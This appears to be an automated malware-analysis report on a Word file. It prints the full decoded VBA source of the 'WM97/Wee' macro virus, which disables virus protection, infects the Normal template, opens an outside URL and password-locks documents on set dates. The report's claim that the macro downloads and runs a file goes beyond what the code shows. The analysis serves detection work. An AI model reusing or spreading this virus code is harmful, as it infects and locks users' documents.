MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an AutoOpen macro, which is a common technique for executing malicious code upon opening the document. The macro attempts to download a file from 'http://www.wee.com' and execute it, indicating a downloader or droppper functionality. The presence of ClamAV detections further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Class-39 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-39
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.wee.com� In document text (OLE body)
- http://www.wee.comIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11212 bytes |
SHA-256: bdd2bfc7fb9ef72bb367a354fd3d74a1b48c58aa3831f6d32fd05a867c0543d9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-25
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Randomize
o = 0: x = 0
On Error GoTo 75
Options.VirusProtection = Chr(48)
Options.SaveNormalPrompt = Chr(48)
Options.ConfirmConversions = Chr(48)
vx = ActiveDocument.VBProject.VBComponents.Item(Abs(1)).codemodule.countoflines
nt = NormalTemplate.VBProject.VBComponents.Item(Abs(1)).codemodule.countoflines
If nt > 0 And vx > 0 Then GoTo 75
If nt = 0 Then
Set Wee = NormalTemplate.VBProject.VBComponents
Set host = ActiveDocument.VBProject.VBComponents
If Month(Now()) = 12 And Day(Now()) = 23 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.wee.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(87) + Chr(69) + Chr(69)
If Month(Now()) = 12 And Day(Now()) = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83) + Chr(32) + Chr(83) + Chr(65) + Chr(89) + Chr(83) + Chr(32) + Chr(72) + Chr(73)
If Month(Now()) = 12 And Day(Now()) = 25 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(87) + Chr(69) + Chr(69)
If Month(Now()) = 12 And Day(Now()) = 26 Then Application.ActiveDocument.Password = "Wee"
host.Item(Abs(1)).Name = Wee.Item(Abs(1)).Name
host.Item(Abs(1)).Export Application.StartupPath & System.Version
End If
If vx = 0 Then Set Wee = ActiveDocument.VBProject.VBComponents
Wee.Item(Abs(1)).codemodule.AddFromFile Application.StartupPath & System.Version
With Wee.Item(Abs(1)).codemodule
For j = Chr(49) To Chr(52)
.deletelines Chr(49)
Next j
End With
If nt = 0 Then Wee.Item(Abs(1)).codemodule.replaceline 1, "Sub AutoClose()"
If nt = 0 Then Wee.Item(Abs(1)).codemodule.replaceline 81, "Sub ToolsMarco()"
If nt = 0 And vx = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
With Wee.Item(Abs(1)).codemodule
For j = Chr(50) To Wee.Item(Abs(1)).codemodule.countoflines Step Chr(50)
x = Int(Rnd(414835) * 403989) + 8485
o = Int(Rnd(298368) * 235865) + 2988
.replaceline j, Chr(39) & x * x & o * o & x * x & o * o & x * x & o * o & x * x & o * o
Next j
End With
75:
If nt <> 0 And vx = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ViewVBCode()
End Sub 'WM97/Wee by Virus ;)
' Processing file: /opt/analyzer/scan_staging/64806a893a944869ab99ad52c99ad797.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4990 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' ArgsCall Read 0x0000
' Line #3:
' Line #4:
' LitDI2 0x0000
' St o
' BoS 0x0000
' LitDI2 0x0000
' St x
' Line #5:
' Line #6:
' OnError 75
' Line #7:
' Line #8:
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt VirusProtection
' Line #9:
' Line #10:
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt SaveNormalPrompt
' Line #11:
' Line #12:
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt ConfirmConversions
' Line #13:
' Line #14:
' LitDI2 0x0001
' FnAbs
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd countoflines
' St vx
' Line #15:
' Line #16:
' LitDI2 0x0001
' FnAbs
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd countoflines
' St nt
' Line #17:
' Line #18:
' Ld nt
' LitDI2 0x0000
' Gt
' Ld vx
' LitDI2 0x0000
' Gt
' And
' If
' BoSImplicit
' GoTo 75
' EndIf
' Line #19:
' Line #20:
' Ld nt
' LitDI2 0x0000
' Eq
' IfBlock
' Line #21:
' Line #22:
' SetS
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.